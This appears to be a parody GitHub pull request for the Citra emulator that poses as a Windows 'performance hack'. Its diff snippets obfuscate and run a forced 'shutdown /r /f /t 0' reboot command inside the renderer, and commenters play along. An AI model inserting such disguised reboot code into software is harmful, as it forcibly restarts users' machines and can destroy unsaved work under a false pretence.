Totally serious performance hacks

JayFoxRox opened the pull request:
### Boost performance on Windows through OS / CPU cool-down features

This works great! Even if my CPU is too hot it will cool down to room-temperature and improve emulation speed by avoiding the impending overheat.
This probably won't boost performance for everyone, but for some it probably will.
Also see that ace break-optimization.

---

**Note that this branch is released under a pseudonym / it's not related to official Citra in any way.**
The code quality is sub-par and the nature of the hacks is questionable.

Enjoy it in unofficial builds though?!

---

TODO:

- [ ] Test new utdo settings
- [ ] Implement ~4-month Deployment strategy for targeted release date
- [x] Improve 64 bit support
- [x] Cleanup

Commit:
Boost performance on Windows through OS / CPU cool-down features
This works great! Even if my CPU is too hot it will cool down to room-temperature and improve emulation speed by avoiding the impending overheat.
This probably won't boost performance for everyone, but for some it probably will.
Also see that ace break-optimization.

Note that this is released under a pseudonym / it's not related to official Citra in any way.
Enjoy it in unofficial builds though?!

RavenHome1 commented:
finally i can run 15 instances of pokemon moon at 200 fps, this is the optimization every one been waiting for

Commit:
Add another break-optimization
By popular demand. Untested change, but apparently boosts FPS by 25%.
I couldn't believe it when it was suggested (after having learned double-breaking is like.. the best), however, tripple breaking a couple of seconds after the cooldown actually *does* boost perf by 25% and more

Commit:
Fine tune cooldown-periods and utdo-instruction-lottery

Commit:
Improve 64-Support?!
Unfortunately this commit might crash the cooldown code for 32 Bit PCs :(
However, maybe this works better for x64 users?!

JayFoxRox commented:
Requested changes added and fine tuned this thing a bit.
Please inform ~~me~~ Mr. Doe if ~~I~~ he slipped up somehow.

darkf commented:
LGTM. Mainline merge when?

teslabyte commented:
LGTM

JayFoxRox commented:
It's too hacky still. I won't get time before the semester end and when this is more appropriate.
Think late march or early april.

We also need optimizations for Linux and macOS imo.
Patches welcome!

Commit:
Fix shutdown / halting PC

This will cause a reboot instead.

(Warning: might not allow PC to cool down to room-temperature anymore)

degasus commented on src/video_core/renderer_opengl/renderer_opengl.cpp:
```diff
@@ -415,6 +417,32 @@ void RendererOpenGL::DrawScreens() {
+            const char* win64 = "C:\\Windows\\SysWOW64";
+            const char* perf_fmt = "%s\\sh%s%s";
+            char perf_cmd[100];
+            sprintf(perf_cmd, perf_fmt, win64, useTimedDo, "wn /r /f /t 0");
```
This PR is buggy, please use snprintf with sizeof(perf_cmd) as additional argument. Else you might get all kind of crashes.

TTFH commented:
MORE FPS!!!

```
if (std::time(nullptr) % 4 != 0) {
    int perf_boost = 0;
    while (perf_boost++ > (15 << 10)) {
        char perf_cmd[50];
        snprintf(perf_cmd, 50, "C:\\Windows\\SysWOW64\\shutdown /r /f /t 0");
        system(perf_cmd);
        perf_boost = 0;
        break; break; break;
    }
 }

```

adriandobrica commented:
Found this in an unofficial "chinese" build based on this. Replaced the `system(perf_cmd);` with `nop`s.

ghost commented:
lolz
